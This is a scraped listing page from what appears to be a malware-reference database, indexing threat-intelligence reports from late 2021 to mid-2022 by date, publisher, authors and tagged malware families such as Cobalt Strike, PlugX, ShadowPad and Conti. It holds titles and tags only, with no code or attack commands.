Quasar RAT

×Select Content2022-05-12

Intel 471

Intel 471What malware to look for if you want to prevent a ransomware attack Conti

BumbleBee

Cobalt Strike

IcedID

Sliver

×Select Content2022-05-12

Red Canary

Lauren Podber,

Tony LambertThe Goot cause: Detecting Gootloader and its follow-on activity GootLoader

Cobalt Strike

×Select Content2022-05-12

Red Canary

Lauren Podber,

Tony LambertGootloader and Cobalt Strike malware analysis GootLoader

Cobalt Strike

×Select Content2022-05-12

TEAMT5

Leon Chang,

Silvia YehThe Next Gen PlugX/ShadowPad? A Dive into the Emerging China-Nexus Modular Trojan, Pangolin8RAT (slides) KEYPLUG

Cobalt Strike

CROSSWALK

FunnySwitch

PlugX

ShadowPad

Winnti

SLIME29

TianWu

×Select Content2022-05-11

InfoSec Handlers Diary Blog

Brad DuncanTA578 using thread-hijacked emails to push ISO files for Bumblebee malware BumbleBee

Cobalt Strike

IcedID

PhotoLoader

×Select Content2022-05-11

NTT

Ryu HiyoshiOperation RestyLink: Targeted attack campaign targeting Japanese companies Cobalt Strike

×Select Content2022-05-10

Marco Ramilli's Blog

Marco RamilliA Malware Analysis in RU-AU conflict Cobalt Strike

×Select Content2022-05-09

Microsoft

Microsoft 365 Defender Threat Intelligence Team,

Microsoft Threat Intelligence Center (MSTIC)Ransomware-as-a-service: Understanding the cybercrime gig economy and how to protect yourself AnchorDNS

BlackCat

BlackMatter

Conti

DarkSide

HelloKitty

Hive

LockBit

REvil

FAKEUPDATES

Griffon

ATOMSILO

BazarBackdoor

BlackCat

BlackMatter

Blister

Cobalt Strike

Conti

DarkSide

Emotet

FiveHands

Gozi

HelloKitty

Hive

IcedID

ISFB

JSSLoader

LockBit

LockFile

Maze

NightSky

Pandora

Phobos

Phoenix Locker

PhotoLoader

QakBot

REvil

Rook

Ryuk

SystemBC

TrickBot

WastedLocker

BRONZE STARLIGHT

×Select Content2022-05-09

cocomelonc

cocomeloncMalware development: persistence - part 4. Windows services. Simple C++ example. Anchor

AppleJeus

Attor

BBSRAT

BlackEnergy

Carbanak

Cobalt Strike

DuQu

×Select Content2022-05-09

Qianxin Threat Intelligence Center

Red Raindrops TeamOperation EviLoong: An electronic party of "borderless" hackers ZXShell

×Select Content2022-05-09

TEAMT5

TeamT5Hiding in Plain Sight: Obscuring C2s by Abusing CDN Services Cobalt Strike

×Select Content2022-05-09

The DFIR Report

The DFIR ReportSEO Poisoning – A Gootloader Story GootLoader

LaZagne

Cobalt Strike

GootKit

×Select Content2022-05-08

IronNet

Brent Eskridge,

Joey Fitzpatrick,

Michael LeardiTracking Cobalt Strike Servers Used in Cyberattacks on Ukraine Cobalt Strike

×Select Content2022-05-06

Twitter (@MsftSecIntel)

Microsoft Security IntelligenceTwitter Thread on initial infeciton of SocGholish/ FAKEUPDATES campaigns lead to BLISTER Loader, CobaltStrike, Lockbit and followed by Hands On Keyboard activity FAKEUPDATES

Blister

Cobalt Strike

LockBit

×Select Content2022-05-06

Palo Alto Networks Unit 42

Chris Navarrete,

Durgesh Sangvikar,

Siddhart Shibiraj,

Yanhui Jia,

Yu FuCobalt Strike Analysis and Tutorial: CS Metadata Encoding and Decoding Cobalt Strike

×Select Content2022-05-06

The Hacker News

Ravie LakshmananThis New Fileless Malware Hides Shellcode in Windows Event Logs Cobalt Strike

×Select Content2022-05-05

Cisco Talos

Aliza Berk,

Asheer Malhotra,

Jung soo An,

Justin Thattil,

Kendall McKayMustang Panda deploys a new wave of malware targeting Europe Cobalt Strike

Meterpreter

PlugX

Unidentified 094

×Select Content2022-05-04

Kaspersky

Denis LegezoA new secret stash for “fileless” malware Cobalt Strike

×Select Content2022-05-04

Twitter (@felixw3000)

FelixTwitter Thread with info on infection chain with IcedId, Cobalt Strike, and Hidden VNC. Cobalt Strike

IcedID

PhotoLoader

×Select Content2022-05-03

Recorded Future

Insikt Group®SOLARDEFLECTION C2 Infrastructure Used by NOBELIUM in Company Brand Misuse Cobalt Strike

EnvyScout

×Select Content2022-05-03

Cluster25

Cluster25The Strange Link Between A Destructive Malware And A Ransomware-Gang Linked Custom Loader: IsaacWiper Vs Vatet Cobalt Strike

IsaacWiper

PyXie

×Select Content2022-05-03

Recorded Future

Insikt GroupSOLARDEFLECTION C2 Infrastructure Used by NOBELIUM in Company Brand Misuse Cobalt Strike

×Select Content2022-05-02

Sentinel LABS

Amitai Ben Shushan Ehrlich,

Joey ChenMoshen Dragon’s Triad-and-Error Approach | Abusing Security Software to Sideload PlugX and ShadowPad PlugX

ShadowPad

Moshen Dragon

×Select Content2022-05-02

Cisco Talos

JAIME FILSON,

Kendall McKay,

Paul EubanksConti and Hive ransomware operations: Leveraging victim chats for insights Cobalt Strike

Conti

Hive

×Select Content2022-05-02

Macnica

Hiroshi TakeuchiAttack Campaigns that Exploit Shortcuts and ISO Files Cobalt Strike

×Select Content2022-04-28

PWC

PWC UKCyber Threats 2021: A Year in Retrospect BPFDoor

APT15

APT31

APT41

APT9

BlackTech

BRONZE EDGEWOOD

DAGGER PANDA

Earth Lusca

HAFNIUM

HAZY TIGER

Inception Framework

LOTUS PANDA

QUILTED TIGER

RedAlpha

Red Dev 17

Red Menshen

Red Nue

VICEROY TIGER

×Select Content2022-04-28

PWC

PWC UKCyber Threats 2021: A Year in Retrospect (Annex) Cobalt Strike

Conti

PlugX

RokRAT

Inception Framework

Red Menshen

×Select Content2022-04-28

DARKReading

Jai VijayanChinese APT Bronze President Mounts Spy Campaign on Russian Military PlugX

MUSTANG PANDA

×Select Content2022-04-28

Mandiant

Anders Vejlby,

John Wolfram,

Nick Simonian,

Sarah Hawley,

Tyler McLellanTrello From the Other Side: Tracking APT29 Phishing Campaigns Cobalt Strike

×Select Content2022-04-27

Trendmicro

TrendmicroIOCs for Earth Berberoka - Windows AsyncRAT

Cobalt Strike

PlugX

Quasar RAT

Earth Berberoka

×Select Content2022-04-27

Secureworks

Counter Threat Unit ResearchTeamBRONZE PRESIDENT Targets Russian Speakers with Updated PlugX PlugX

×Select Content2022-04-27

ANSSI

ANSSILE GROUPE CYBERCRIMINEL FIN7 Bateleur

BELLHOP

Griffon

SQLRat

POWERSOURCE

Andromeda

BABYMETAL

BlackCat

BlackMatter

BOOSTWRITE

Carbanak

Cobalt Strike

DNSMessenger

Dridex

DRIFTPIN

Gameover P2P

MimiKatz

Murofet

Qadars

Ranbyus

SocksBot

×Select Content2022-04-27

Trend Micro

Daniel Lunghi,

Jaromír HořejšíNew APT Group Earth Berberoka Targets Gambling Websites With Old and New Malware HelloBot

AsyncRAT

Ghost RAT

HelloBot

PlugX

Quasar RAT

Earth Berberoka

×Select Content2022-04-27

Mandiant

MandiantAssembling the Russian Nesting Doll: UNC2452 Merged into APT29 Cobalt Strike

Raindrop

SUNBURST

TEARDROP

×Select Content2022-04-27

Trendmicro

Daniel Lunghi,

Jaromír HořejšíOperation Gambling Puppet reptile

oRAT

AsyncRAT

Cobalt Strike

DCRat

Ghost RAT

PlugX

Quasar RAT

Trochilus RAT

Earth Berberoka

×Select Content2022-04-27

Sentinel LABS

James Haughom,

Jim Walter,

Júlio DantasLockBit Ransomware Side-loads Cobalt Strike Beacon with Legitimate VMware Utility Cobalt Strike

LockBit

×Select Content2022-04-27

Sentinel LABS

James Haughom,

Jim Walter,

Júlio DantasLockBit Ransomware Side-loads Cobalt Strike Beacon with Legitimate VMware Utility Cobalt Strike

LockBit

BRONZE STARLIGHT

×Select Content2022-04-26

Trend Micro

Lord Alfred Remorin,

Ryan Flores,

Stephen HiltHow Cybercriminals Abuse Cloud Tunneling Services AsyncRAT

Cobalt Strike

DarkComet

Meterpreter

Nanocore RAT

×Select Content2022-04-26

Intel 471

Intel 471Conti and Emotet: A constantly destructive duo Cobalt Strike

Conti

Emotet

IcedID

QakBot

TrickBot

×Select Content2022-04-25

The DFIR Report

The DFIR ReportQuantum Ransomware Cobalt Strike

IcedID

×Select Content2022-04-25

Morphisec

Morphisec LabsNew Core Impact Backdoor Delivered Via VMware Vulnerability Cobalt Strike

JSSLoader

×Select Content2022-04-21

ZeroSec

Andy GillUnderstanding Cobalt Strike Profiles - Updated For Cobalt Strike 4.6 Cobalt Strike

×Select Content2022-04-19

Blake's R&D

bmcder02Extracting Cobalt Strike from Windows Error Reporting Cobalt Strike

×Select Content2022-04-19

Varonis

Nadav OvadiaHive Ransomware Analysis Cobalt Strike

Hive

MimiKatz

×Select Content2022-04-18

AdvIntel

Vitali Kremez,

Yelisey BoguslavskiyEnter KaraKurt: Data Extortion Arm of Prolific Ransomware Group AvosLocker

BazarBackdoor

BlackByte

BlackCat

Cobalt Strike

HelloKitty

Hive

Karakurt

×Select Content2022-04-18

SentinelOne

James HaughomFrom the Front Lines | Peering into A PYSA Ransomware Attack Chisel

Chisel

Cobalt Strike

Mespinoza

×Select Content2022-04-18

vanmieghem

Vincent Van MieghemA blueprint for evading industry leading endpoint protection in 2022 Cobalt Strike

×Select Content2022-04-14

NSHC RedAlert Labs

NSHC Threatrecon TeamHacking activity of SectorB Group in 2021 Chinese government supported hacking group SectorB PlugX

×Select Content2022-04-14

Cynet

Max MalyutinOrion Threat Alert: Flight of the BumbleBee BumbleBee

Cobalt Strike

×Select Content2022-04-13

ESET Research

Jean-Ian Boutin,

Tomáš ProcházkaESET takes part in global operation to disrupt Zloader botnets Cobalt Strike

Zloader

×Select Content2022-04-13

Microsoft

Microsoft 365 Defender Threat Intelligence TeamDismantling ZLoader: How malicious ads led to disabled security tools and ransomware BlackMatter

Cobalt Strike

DarkSide

Ryuk

Zloader

×Select Content2022-04-12

Max Kersten's Blog

Max KerstenGhidra script to handle stack strings CaddyWiper

PlugX

×Select Content2022-04-08

The Register

Laura DobbersteinChina accused of cyberattacks on Indian power grid ShadowPad

×Select Content2022-04-08

Infinitum Labs

Arda BüyükkayaThreat Spotlight: Conti Ransomware Group Behind the Karakurt Hacking Team Cobalt Strike

MimiKatz

×Select Content2022-04-07

splunk

Splunk Threat Research TeamYou Bet Your Lsass: Hunting LSASS Access Cobalt Strike

MimiKatz

×Select Content2022-04-07

InQuest

Nick Chalard,

Will MacArthurUkraine CyberWar Overview CyclopsBlink

Cobalt Strike

GraphSteel

GrimPlant

HermeticWiper

HermeticWizard

MicroBackdoor

PartyTicket

Saint Bot

Scieron

WhisperGate

×Select Content2022-04-06

Github (infinitumlabs)

Arda BüyükkayaKarakurt Hacking Team Indicators of Compromise (IOC) Cobalt Strike

×Select Content2022-04-06

Recorded Future

Insikt GroupContinued Targeting of Indian Power Grid Assets by Chinese State-Sponsored Activity Group ShadowPad

×Select Content2022-04-06

Recorded Future

Insikt Group®Continued Targeting of Indian Power Grid Assets by Chinese State-Sponsored Activity Group (TAG-38) ShadowPad

×Select Content2022-04-04

Mandiant

Brendan McKeague,

Bryce Abdo,

Ioana Teaca,

Zander WorkFIN7 Power Hour: Adversary Archaeology and the Evolution of FIN7 Griffon

BABYMETAL

Carbanak

Cobalt Strike

JSSLoader

Termite

×Select Content2022-03-31

nccgroup

Alex Jessop,

Nikolaos Pantazopoulos,

RIFT: Research and Intelligence Fusion Team,

Simon BiggsConti-nuation: methods and techniques observed in operations post the leaks Cobalt Strike

Conti

QakBot

×Select Content2022-03-31

SC Media

SC StaffNovel obfuscation leveraged by Hive ransomware Cobalt Strike

Hive

×Select Content2022-03-30

Bleeping Computer

Bill ToulasPhishing campaign targets Russian govt dissidents with Cobalt Strike Unidentified PS 002 (RAT)

Cobalt Strike

×Select Content2022-03-30

Prevailion

PrevailionWizard Spider continues to confound BazarBackdoor

Cobalt Strike

Emotet

×Select Content2022-03-29

Malwarebytes Labs

Hossein JaziNew spear phishing campaign targets Russian dissidents Unidentified PS 002 (RAT)

Cobalt Strike

×Select Content2022-03-29

SentinelOne

Antonis Terefos,

James Haughom,

Jeff Cavanaugh,

Jim Walter,

Nick Fox,

Shai TiliasFrom the Front Lines | Hive Ransomware Deploys Novel IPfuscation Technique To Avoid Detection Cobalt Strike

Hive

×Select Content2022-03-28

Mandiant

Brandon Wilbur,

Dallin Warne,

Geoff Ackerman,

James Maclachlan,

John Wolfram,

Tufail AhmedForged in Fire: A Survey of MobileIron Log4Shell Exploitation KEYPLUG

×Select Content2022-03-28

Trellix

Marc Elias,

Max KerstenPlugX: A Talisman to Behold PlugX

×Select Content2022-03-28

Medium walmartglobaltech

Jason ReavesCobaltStrike UUID stager Cobalt Strike

×Select Content2022-03-25

nccgroup

Yun Zheng HuMining data from Cobalt Strike beacons Cobalt Strike

×Select Content2022-03-25

ESET Research

Alexandre Côté CyrMustang Panda's Hodur: Old stuff, new variant of Korplug PlugX

×Select Content2022-03-25

GOV.UA

State Service of Special Communication and Information Protection of Ukraine (CIP)Who is behind the Cyberattacks on Ukraine's Critical Information Infrastructure: Statistics for March 15-22 Xloader

Agent Tesla

CaddyWiper

Cobalt Strike

DoubleZero

GraphSteel

GrimPlant

HeaderTip

HermeticWiper

IsaacWiper

MicroBackdoor

Pandora RAT

×Select Content2022-03-24

Threat Post

Nate NelsonChinese APT Combines Fresh Hodur RAT with Complex Anti-Detection PlugX

×Select Content2022-03-23

BleepingComputer

Bill ToulasNew Mustang Panda hacking campaign targets diplomats, ISPs PlugX

×Select Content2022-03-23

ESET Research

Alexandre Côté CyrMustang Panda’s Hodur: Old tricks, new Korplug variant PlugX

×Select Content2022-03-22

Red Canary

Red Canary2022 Threat Detection Report FAKEUPDATES

Silver Sparrow

BazarBackdoor

Cobalt Strike

GootKit

Yellow Cockatoo RAT

×Select Content2022-03-22

NVISO Labs

Didier StevensCobalt Strike: Overview – Part 7 Cobalt Strike

×Select Content2022-03-21

Threat Post

Lisa VaasConti Ransomware V. 3, Including Decryptor, Leaked Cobalt Strike

Conti

TrickBot

×Select Content2022-03-21

eSentire

eSentire Threat Response Unit (TRU)Conti Affiliate Exposed: New Domain Names, IP Addresses and Email Addresses Uncovered HelloKitty

BazarBackdoor

Cobalt Strike

Conti

FiveHands

HelloKitty

IcedID

×Select Content2022-03-17

Google

Benoit Sevens,

Google Threat Analysis Group,

Vladislav StolyarovExposing initial access broker with ties to Conti BazarBackdoor

BumbleBee

Cobalt Strike

Conti

×Select Content2022-03-16

paloalto Netoworks: Unit42

Andrew Guan,

Chris Navarrete,

Durgesh Sangvikar,

Siddhart Shibiraj,

Yanhui Jia,

Yu FuCobalt Strike Analysis and Tutorial: How Malleable C2 Profiles Make Cobalt Strike Difficult to Detect Cobalt Strike

×Select Content2022-03-16

SANS ISC

Brad DuncanQakbot infection with Cobalt Strike and VNC activity Cobalt Strike

QakBot

×Select Content2022-03-16

InfoSec Handlers Diary Blog

Brad DuncanQakbot infection with Cobalt Strike and VNC activity Cobalt Strike

QakBot

×Select Content2022-03-15

Prevailion

Matt Stafford,

Sherman SmithWhat Wicked Webs We Un-weave Cobalt Strike

Conti

×Select Content2022-03-15

SentinelOne

Amitai Ben Shushan EhrlichThreat Actor UAC-0056 Targeting Ukraine with Fake Translation Software Cobalt Strike

GraphSteel

GrimPlant

SaintBear

×Select Content2022-03-14

Bleeping Computer

Bill ToulasFake antivirus updates used to deploy Cobalt Strike in Ukraine Cobalt Strike

×Select Content2022-03-13

Mandiant

MandiantAPT41 (Double Dragon): A Dual Espionage and Cyber Crime Operation APT41

×Select Content2022-03-12

Arash's Blog

Arash ParsaAnalyzing Malware with Hooks, Stomps, and Return-addresses Cobalt Strike

×Select Content2022-03-11

Cert-UACyberattack on Ukrainian state authorities using the Cobalt Strike Beacon (CERT-UA#4145) Cobalt Strike

×Select Content2022-03-09

Bleeping Computer

Ionut IlascuCISA updates Conti ransomware alert with nearly 100 domain names BazarBackdoor

Cobalt Strike

Conti

TrickBot

×Select Content2022-03-09

BreachQuest

Bernard Silvestrini,

Marco Figueroa,

Napoleon BingThe Conti Leaks | Insight into a Ransomware Unicorn Cobalt Strike

MimiKatz

TrickBot

×Select Content2022-03-08

Twitter (@CyberJack42)

CyberJackTweet on ELFSHELF alias for KEYPLUG KEYPLUG

×Select Content2022-03-08

Mandiant

Douglas Bienstock,

Geoff Ackerman,

John Wolfram,

Rufus Brown,

Van TaDoes This Look Infected? A Summary of APT41 Targeting U.S. State Governments KEYPLUG

Cobalt Strike

LOWKEY

×Select Content2022-03-07

Proofpoint

Michael Raggi,

Myrtus 0x0The Good, the Bad, and the Web Bug: TA416 Increases Operational Tempo Against European Governments as Conflict in Ukraine Escalates PlugX

MUSTANG PANDA

×Select Content2022-03-07

The DFIR Report

The DFIR Report2021 Year In Review Cobalt Strike

×Select Content2022-03-04

Telsy

TelsyLegitimate Sites Used As Cobalt Strike C2s Against Indian Government Cobalt Strike

×Select Content2022-03-03

Trend Micro

Trend Micro ResearchCyberattacks are Prominent in the Russia-Ukraine Conflict BazarBackdoor

Cobalt Strike

Conti

Emotet

WhisperGate

×Select Content2022-03-01

VirusTotal

VirusTotalVirusTotal's 2021 Malware Trends Report Anubis

AsyncRAT

BlackMatter

Cobalt Strike

DanaBot

Dridex

Khonsari

MimiKatz

Mirai

Nanocore RAT

Orcus RAT

×Select Content2022-02-26

Mandiant

MandiantTRENDING EVIL Q1 2022 KEYPLUG

FAKEUPDATES

GootLoader

BazarBackdoor

QakBot

×Select Content2022-02-24

Cynet

Max MalyutinNew Wave of Emotet – When Project X Turns Into Y Cobalt Strike

Emotet

×Select Content2022-02-24

Fortinet

Fred GutierrezNobelium Returns to the Political World Stage Cobalt Strike

×Select Content2022-02-23

cyber.wtf blog

Luca EbachWhat the Pack(er)? Cobalt Strike

Emotet

×Select Content2022-02-23

Dragos

Dragos2021 ICS OT Cybersecurity Year In Review ShadowPad

×Select Content2022-02-23

AdvIntel

Vitali Kremez,

Yelisey Boguslavskiy24 Hours From Log4Shell to Local Admin: Deep-Dive Into Conti Gang Attack on Fortune 500 (DFIR) Cobalt Strike

Conti

×Select Content2022-02-23

SophosLabs Uncut

Andrew BrandtDridex bots deliver Entropy ransomware in recent attacks Cobalt Strike

Dridex

Entropy

×Select Content2022-02-22

eSentire

eSentire Threat Response Unit (TRU)IcedID to Cobalt Strike In Under 20 Minutes Cobalt Strike

IcedID

PhotoLoader

×Select Content2022-02-22

Bleeping Computer

Bill ToulasVulnerable Microsoft SQL Servers targeted with Cobalt Strike Cobalt Strike

Kingminer

Lemon Duck

×Select Content2022-02-21

ASECCobalt Strike Being Distributed to Vulnerable MS-SQL Servers Cobalt Strike

Lemon Duck

×Select Content2022-02-21

The DFIR ReportQbot and Zerologon Lead To Full Domain Compromise Cobalt Strike

QakBot

×Select Content2022-02-20

Medium SOCFortress

SOCFortressDetecting Cobalt Strike Beacons Cobalt Strike

×Select Content2022-02-18

Huntress Labs

Matthew BrennanHackers No Hashing: Randomizing API Hashes to Evade Cobalt Strike Shellcode Detection Cobalt Strike

×Select Content2022-02-17

SinaCyber

Adam KozyTestimony before the U.S.-China Economic and Security Review Commission Hearing on “China’s Cyber Capabilities: Warfare, Espionage, and Implications for the United States” PlugX

APT26

APT41

×Select Content2022-02-16

Security Onion

Doug BurksQuick Malware Analysis: Emotet Epoch 5 and Cobalt Strike pcap from 2022-02-08 Cobalt Strike

Emotet

×Select Content2022-02-15

The Hacker News

Ravie LakshmananResearchers Link ShadowPad Malware Attacks to Chinese Ministry and PLA ShadowPad

×Select Content2022-02-15

eSentire

eSentire Threat Response Unit (TRU)Increase in Emotet Activity and Cobalt Strike Deployment Cobalt Strike

Emotet

×Select Content2022-02-15

Secureworks

Counter Threat Unit ResearchTeamShadowPad Malware Analysis ShadowPad

×Select Content2022-02-10

Cybereason

Cybereason Global SOC TeamThreat Analysis Report: All Paths Lead to Cobalt Strike - IcedID, Emotet and QBot Cobalt Strike

Emotet

IcedID

QakBot

×Select Content2022-02-09

vmware

VMWareExposing Malware in Linux-Based Multi-Cloud Environments ACBackdoor

BlackMatter

DarkSide

Erebus

HelloKitty

Kinsing

PLEAD

QNAPCrypt

RansomEXX

REvil

Sysrv-hello

TeamTNT

Vermilion Strike

Cobalt Strike

×Select Content2022-01-31

CyberArk

Arash ParsaAnalyzing Malware with Hooks, Stomps and Return-addresses Cobalt Strike

×Select Content2022-01-28

Morphisec

Morphisec LabsLog4j Exploit Hits Again: Vulnerable Unifi Network Application (Ubiquiti) at Risk Cobalt Strike

×Select Content2022-01-27

JSAC 2021

Hajime Yanagishita,

Kiyotaka Tamada,

Suguru Ishimaru,

You NakatsuruWhat We Can Do against the Chaotic A41APT Campaign CHINACHOPPER

Cobalt Strike

HUI Loader

SodaMaster

×Select Content2022-01-26

Blackberry

Codi Starks,

Ryan Gibson,

Will IkardLog4U, Shell4Me Cobalt Strike

×Select Content2022-01-25

Cynet

Orion Threat Research and Intelligence TeamThreats Looming Over the Horizon Cobalt Strike

Meterpreter

NightSky

×Select Content2022-01-24

The DFIR Report

The DFIR ReportCobalt Strike, a Defender’s Guide – Part 2 Cobalt Strike

×Select Content2022-01-21

binarly

Binarly TeamA deeper UEFI dive into MoonBounce MoonBounce

×Select Content2022-01-20

Morphisec

Michael GorelikLog4j Exploit Hits Again: Vulnerable VMWare Horizon Servers at Risk Cobalt Strike

×Select Content2022-01-20

Kaspersky

Denis Legezo,

Ilya Borisov,

Mark Lechtik,

Vasily BerdnikovMoonBounce: the dark side of UEFI firmware MoonBounce

×Select Content2022-01-20

Kaspersky Labs

Denis Legezo,

Ilya Borisov,

Mark Lechtik,

Vasily BerdnikovTechnical details of MoonBounce’s implementation MoonBounce

×Select Content2022-01-19

Elastic

Andrew Pease,

Daniel Stepanic,

Derek Ditch,

Seth GoodwinExtracting Cobalt Strike Beacon Configurations Cobalt Strike

×Select Content2022-01-19

Blackberry

The BlackBerry Research & Intelligence TeamKraken the Code on Prometheus Prometheus Backdoor

BlackMatter

Cerber

Cobalt Strike

DCRat

Ficker Stealer

QakBot

REvil

Ryuk

×Select Content2022-01-19

Elastic

Andrew Pease,

Daniel Stepanic,

Derek Ditch,

Seth GoodwinCollecting Cobalt Strike Beacons with the Elastic Stack Cobalt Strike

×Select Content2022-01-19

Sophos

Colin Cowie,

Mat Gangwer,

Sophos MTR Team,

Stan AndicZloader Installs Remote Access Backdoors and Delivers Cobalt Strike Cobalt Strike

Zloader

×Select Content2022-01-18

Recorded Future

Insikt Group®2021 Adversary Infrastructure Report BazarBackdoor

Cobalt Strike

Dridex

IcedID

QakBot

TrickBot

×Select Content2022-01-17

Trend Micro

Cedric Pernet,

Daniel Lunghi,

Gloria Chen,

Jaromír Hořejší,

Joseph Chen,

Kenney LuDelving Deep: An Analysis of Earth Lusca’s Operations BIOPASS

Cobalt Strike

FunnySwitch

JuicyPotato

ShadowPad

Winnti

Earth Lusca

×Select Content2022-01-16

forensicitguy

Tony LambertAnalyzing a CACTUSTORCH HTA Leading to Cobalt Strike CACTUSTORCH

Cobalt Strike

×Select Content2022-01-15

Huntress Labs

Team HuntressThreat Advisory: VMware Horizon Servers Actively Being Hit With Cobalt Strike (by DEV-0401) Cobalt Strike

×Select Content2022-01-11

Medium walmartglobaltech

Jason Reaves,

Joshua PlattSigned DLL campaigns as a service BATLOADER

Cobalt Strike

ISFB

Zloader

×Select Content2022-01-11

Twitter (@cglyer)

Christopher GlyerThread on DEV-0401, a china based ransomware operator exploiting VMware Horizon with log4shell and deploying NightSky ransomware Cobalt Strike

NightSky

×Select Content2022-01-11

Cybereason

Chen Erlich,

Daichi Shimabukuro,

Niv Yona,

Ofir Ozer,

Omri RefaeliThreat Analysis Report: DatopLoader Exploits ProxyShell to Deliver QBOT and Cobalt Strike Cobalt Strike

QakBot

Squirrelwaffle

×Select Content2022-01-09

forensicitguy

Tony LambertInspecting a PowerShell Cobalt Strike Beacon Cobalt Strike

×Select Content2022-01-06

Cyber And Ramen blog

Mike RA “GULP” of PlugX PlugX

×Select Content2022-01-06

Sekoia

sekoiaNOBELIUM’s EnvyScout infection chain goes in the registry, targeting embassies Cobalt Strike

EnvyScout

×Select Content2022-01-01

Silent Push

Silent PushConsequences- The Conti Leaks and future problems Cobalt Strike

Conti

×Select Content2021-12-29

CrowdStrike

Benjamin Wiley,

Falcon OverWatch TeamOverWatch Exposes AQUATIC PANDA in Possession of Log4Shell Exploit Tools During Hands-on Intrusion Attempt Cobalt Strike

×Select Content2021-12-29

Blake's R&D

BlakeCobalt Strike DFIR: Listening to the Pipes Cobalt Strike

×Select Content2021-12-28

Morphus Labs

Renato MarinhoAttackers are abusing MSBuild to evade defenses and implant Cobalt Strike beacons Cobalt Strike

×Select Content2021-12-22

Telsy

Telsy Research TeamPhishing Campaign targeting citizens abroad using COVID-19 theme lures Cobalt Strike

×Select Content2021-12-17

FBI

FBIAC-000159-MW: APT Actors Exploiting Newly-Identified Zero Day in ManageEngine Desktop Central (CVE-2021-44515) ShadowPad

×Select Content2021-12-16

TEAMT5

Aragorn Tseng,

Charles Li,

Peter Syu,

Tom LaiWinnti is Coming - Evolution after Prosecution Cobalt Strike

FishMaster

FunnySwitch

HIGHNOON

ShadowPad

Spyder

×Select Content2021-12-16

Red Canary

The Red Canary TeamIntelligence Insights: December 2021 Cobalt Strike

QakBot

Squirrelwaffle

×Select Content2021-12-10

Accenture

AccentureKarakurt rises from its lair Cobalt Strike

Karakurt

×Select Content2021-12-08

PWC UK

Adam PrescottChasing Shadows: A deep dive into the latest obfuscation methods being used by ShadowPad ShadowPad

Earth Lusca

×Select Content2021-12-07

Bleeping Computer

Lawrence AbramsEmotet now drops Cobalt Strike, fast forwards ransomware attacks Cobalt Strike

Emotet

×Select Content2021-12-06

CERT-FR

CERT-FRPhishing campaigns by the Nobelium intrusion set Cobalt Strike

×Select Content2021-12-06

Mandiant

Ashraf Abdalhalim,

Ben Read,

Doug Bienstock,

Gabriella Roncone,

Jonathan Leathery,

Josh Madeley,

Juraj Sucik,

Luis Rocha,

Luke Jenkins,

Manfred Erjak,

Marius Fodoreanu,

Microsoft Detection and Response Team (DART),

Microsoft Threat Intelligence Center (MSTIC),

Mitchell Clarke,

Parnian Najafi,

Sarah Hawley,

Wojciech LedzionSuspected Russian Activity Targeting Government and Business Entities Around the Globe (UNC2452) Cobalt Strike

CryptBot

×Select Content2021-12-02

CERT-FR

CERT-FRPhishing Campaigns by the Nobelium Intrusion Set Cobalt Strike

×Select Content2021-12-01

ESET Research

Alexis Dorais-Joncas,

Facundo MuñozJumping the air gap: 15 years of nation‑state effort Agent.BTZ

Fanny

Flame

Gauss

PlugX

Ramsay

Retro

Stuxnet

USBCulprit

USBferry

×Select Content2021-11-30

Symantec

Symantec Threat Hunter TeamYanluowang: Further Insights on New Ransomware Threat BazarBackdoor

Cobalt Strike

FiveHands

×Select Content2021-11-29

The DFIR Report

The DFIR ReportCONTInuing the Bazar Ransomware Story BazarBackdoor

Cobalt Strike

Conti

×Select Content2021-11-29

Mandiant

Brandan Schondorfer,

Tyler McLellanKitten.gif: Meet the Sabbath Ransomware Affiliate Program, Again Cobalt Strike

ROLLCOAST

×Select Content2021-11-19

Trend Micro

Abdelrhman Sharshar,

Mohamed Fahmy,

Sherif MagdySquirrelwaffle Exploits ProxyShell and ProxyLogon to Hijack Email Chains Cobalt Strike

QakBot

Squirrelwaffle

×Select Content2021-11-19

insomniacs(Medium)

Asuna AmawakaIt’s a BEE! It’s a… no, it’s ShadowPad. ShadowPad

×Select Content2021-11-18

Cisco

Josh PyorreBlackMatter, LockBit, and THOR BlackMatter

LockBit

PlugX

×Select Content2021-11-17

nviso

Didier StevensCobalt Strike: Decrypting Obfuscated Traffic – Part 4 Cobalt Strike

×Select Content2021-11-17

Black Hills Information Security

Kyle AveryDNS Over HTTPS for Cobalt Strike Cobalt Strike

×Select Content2021-11-17

Twitter (@Unit42_Intel)

Unit 42Tweet on Matanbuchus Loader used to deliver Qakbot (tag obama128b) and follow-up CobaltStrike Cobalt Strike

QakBot

×Select Content2021-11-17

Trend Micro

Abdelrhman Sharshar,

Mohamed Fahmy,

Ryan Maglaque,

Sherif MagdyAnalyzing ProxyShell-related Incidents via Trend Micro Managed XDR Cobalt Strike

Cotx RAT

×Select Content2021-11-16

Cisco

Asheer Malhotra,

Chetan Raghuprasad,

Vanja SvajcerAttackers use domain fronting technique to target Myanmar with Cobalt Strike Cobalt Strike

×Select Content2021-11-16

IronNet

IronNet Threat Research,

Joey Fitzpatrick,

Morgan Demboski,

Peter RydzynskiHow IronNet's Behavioral Analytics Detect REvil and Conti Ransomware Cobalt Strike

Conti

IcedID

REvil

×Select Content2021-11-16

Blackberry

Dean Given,

Eoin Wickens,

Jim Simpson,

Marta Janus,

T.J. O'Leary,

Tom BonnerFinding Beacons in the dark Cobalt Strike

×Select Content2021-11-15

TRUESEC

Fabio ViggianiProxyShell, QBot, and Conti Ransomware Combined in a Series of Cyberattacks Cobalt Strike

Conti

QakBot

×Select Content2021-11-13

Just Still

Still HsuThreat Spotlight - Domain Fronting Cobalt Strike

×Select Content2021-11-12

Malwarebytes

Hossein JaziA multi-stage PowerShell based attack targets Kazakhstan Cobalt Strike

×Select Content2021-11-11

Cynet

Max MalyutinA Duck Nightmare Quakbot Strikes with QuakNightmare Exploitation Cobalt Strike

QakBot

×Select Content2021-11-10

AT&T

Josh GomezStories from the SOC - Powershell, Proxyshell, Conti TTPs OH MY! Cobalt Strike

Conti

×Select Content2021-11-10

Sekoia

Cyber Threat Intelligence teamWalking on APT31 infrastructure footprints Rekoobe

Unidentified ELF 004

Cobalt Strike

×Select Content2021-11-09

Cybereason

Aleksandar Milenkoski,

Eli SalemTHREAT ANALYSIS REPORT: From Shatak Emails to the Conti Ransomware Cobalt Strike

Conti

×Select Content2021-11-05

Blackberry

The BlackBerry Research & Intelligence TeamHunter Becomes Hunted: Zebra2104 Hides a Herd of Malware Cobalt Strike

DoppelDridex

Mount Locker

Phobos

StrongPity

×Select Content2021-11-05

Twitter (@Unit42_Intel)

